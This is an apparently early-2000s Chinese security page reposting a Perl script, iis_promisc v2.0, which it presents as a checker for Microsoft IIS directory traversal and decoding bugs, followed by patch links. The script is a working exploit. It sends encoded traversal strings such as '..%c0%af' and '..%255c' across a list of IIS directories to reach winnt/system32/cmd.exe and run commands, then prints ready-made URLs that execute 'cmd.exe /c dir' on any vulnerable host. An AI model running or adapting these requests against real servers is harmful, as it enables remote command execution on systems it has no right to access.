一份检查你的IIS是否存在那两个重大漏洞的代码

/ns/wz/sys/data/20010527070114.htm

Details
下列程序帮助你检验Escaped Characters Decoding Bug and Unicode Directory Transversal Bug如果你的服务器存在漏洞,它将提供给一个能解决问题的url

Tool:
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested!
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/
# The package libwww is found in many linux distributions
#
# by inode@unsekure.com.br
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001

if ($#ARGV<0) {die "\n-*- iis_promisc -*-\nUse: $0 www.target.com\n\n";}

use LWP;

$ua = new LWP::UserAgent;

## Uncomment the line below to use a proxy server
#$ua->proxy(['http'], 'http://proxy.server.com:PORT/');

$ua->timeout(60);
$ua->agent("Mozilla/5.0 (Win95)");

($target = @ARGV[0]);
$vuln_flag = 0;
$port = 80;
$test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
$dir_command = "winnt/system32/cmd.exe?/c+dir";
$iis = "1";

my @dir=(

# You can add more exec dirs here
#"/somedir/",

"/", ## wwwroot
"/scripts/",
"/msadc/",
"/cgi-bin/",
"/bin/",
"/samples/",
"/_vti_cnf/",
"/_vti_bin/",
"/adsamples/",
"/iisadmpwd/",
"/Rpc/",
"/PBServer/");

my @string=(

"..%255c..%255c..%255c..%255c..%255c..%255c",
"..%c0%af../..%c0%af../..%c0%af../",
"..%e0%80%af../..%e0%80%af../..%e0%80%af../",
"boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C");

if ( ($ENV{'OSTYPE'} || $ENV{'TERM'}) =~ /linux/ ) {
$found = "lynx -dump";
} else { $found = "-*- VULN -*-"; }


foreach $vul_dir (@dir) {
foreach $vul_string (@string) {
if ($iis) {
@output = conn($vul_dir.$vul_string);
foreach $output_line (@output) {
if ($output_line =~ /MinhaNossaSenhoraDoPerpetuoSocorro/) {
$vuln_flag = $vuln_flag + 1;
print "\n$found http://".$target.$vul_dir.$vul_string.$dir_command."\n";
}
}
} else { print $output_line."\n"; exit; }
}
}
if ($vuln_flag !=0 ) {
print qq~

-*--*--*--*--*--*--*--*--*--*--*--*--*-
-*- Escaped Characters Decoding Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://download.microsoft.com/download/win2000platform/Patch/q293826/NT5/EN-US/Q293826_W2K_SP3_x86_en.EXE
-*- Microsoft IIS 4.0 PATCH:
-*- http://download.microsoft.com/download/winntsp/Patch/q293826/NT4/EN-US/Q295534i.exe

-*--*--*--*--*--*--*--*--*--*--*--*--*-*-
-*- Unicode Directory Transversal Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
-*- Microsoft IIS 4.0 PATCH:
-*- http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

-*--*--*--*--*--*--*--*--*--*--*-*-
-*- Executable File Parsing Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE
-*- Microsoft IIS 4.0 PATCH:
-*- http://www.microsoft.com/ntserver/nts/downloads/critical/q277873
-*- $vuln_flag hole(s) found at $target! -*-

~;

} else {
print "\n-*- $target: Not vulnerable -*-\n\n";
exit;
}


sub conn {
my ($GET_STR) = @_;
my $req = new HTTP::Request('GET','http://'.$target.$GET_STR.$test_command);
my $res= $ua->request($req);

if ( $res->server =~/IIS/ ){
$iis = 1;
return $res->content;
} else {
$iis = 0;
$err = $res->code;
if ( $err == 404 ) {
return print "\n-*- Not running MS-IIS -*-\n";
} else { return print "\n-*- HTTP error code $err Connection problems -*-\n"; }
}
}


Links
The information has been provided by Leonardo Eloy and Alexandre de Abreu.